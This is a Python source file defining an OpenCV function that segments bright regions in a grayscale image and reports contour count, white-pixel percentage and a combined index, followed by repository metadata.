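# Pipeline sketch: morphological closing fills pinholes, a mean blur smooths speckle,\n# a fixed-ratio threshold binarises the image, and contour statistics are computed.\n# Minimal usage sketch (the file name is hypothetical):\n# img = cv2.imread('sample.png', cv2.IMREAD_GRAYSCALE)\n# n_blobs, pct_white, index = get_indicator(img, kernel_size=(41, 41))\n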
def get_indicator(img, kernel_size=41, ratio=0.25, area_thres=(200, 3000)):\n \"\"\"Segment the bright (B-lite) regions of a grayscale image and report contour statistics.\n\n img: (np.array) grayscale image; white is for B-lite, black is for others\n kernel_size: (int or tuple[int, int]) size of the blur filter (a mean filter); e.g. 3 means a 3x3 mean filter\n ratio: (float) between 0. and 1.; the threshold used after mean filtering\n area_thres: (tuple[int, int]) ignore all areas which are not inside this range\n Returns (N, pct, index): the contour count, the percent of white pixels, and the count times the white fraction.\n \"\"\"\n # Accept a single int as shorthand for a square kernel\n if isinstance(kernel_size, int):\n kernel_size = (kernel_size, kernel_size)\n # Fill small dark pinholes before smoothing\n img = cv2.morphologyEx(img, cv2.MORPH_CLOSE, np.ones((5, 5), np.uint8))\n blur = cv2.blur(img, kernel_size)\n # remove the border affected by the filter padding\n blur = np.copy(blur[kernel_size[0]//2 + 1: -kernel_size[0]//2 + 1, kernel_size[1]//2 + 1: -(kernel_size[1]//2) + 1])\n thresh = int(ratio*255)\n _, out = cv2.threshold(blur, thresh, 255, cv2.THRESH_BINARY)\n\n contours, hierarchy = cv2.findContours(np.uint8(out), cv2.RETR_CCOMP, cv2.CHAIN_APPROX_SIMPLE)\n if hierarchy is None:\n return 0, 0, 0\n\n # Area of each top-level contour, minus the holes nested inside it\n tmp_area = {}\n for ind, tmp_hi in enumerate(hierarchy[0]):\n if tmp_hi[3] == -1:\n tmp_area[ind] = cv2.contourArea(contours[ind])\n for ind, tmp_hi in enumerate(hierarchy[0]):\n if tmp_hi[3] != -1:\n tmp_area[tmp_hi[3]] -= cv2.contourArea(contours[ind])\n tmp_area = [tmp_area[area_id] for area_id in tmp_area if area_thres[1] > tmp_area[area_id] > area_thres[0]]\n plt.hist(tmp_area, 50)\n plt.show()\n N = len(tmp_area)\n\n percentage = np.sum(out/255)/(out.shape[0]*out.shape[1])\n print(f'Number of contours: {N}')\n print(f'Percentage( % ): {100*percentage}')\n print(f'Index: {percentage*N}')\n return N, 100*percentage, percentage*N","repo_name":"Kamin-At/Image_segmentation","sub_path":"segmentation.py","file_name":"segmentation.py","file_ext":"py","file_size_in_byte":1772,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}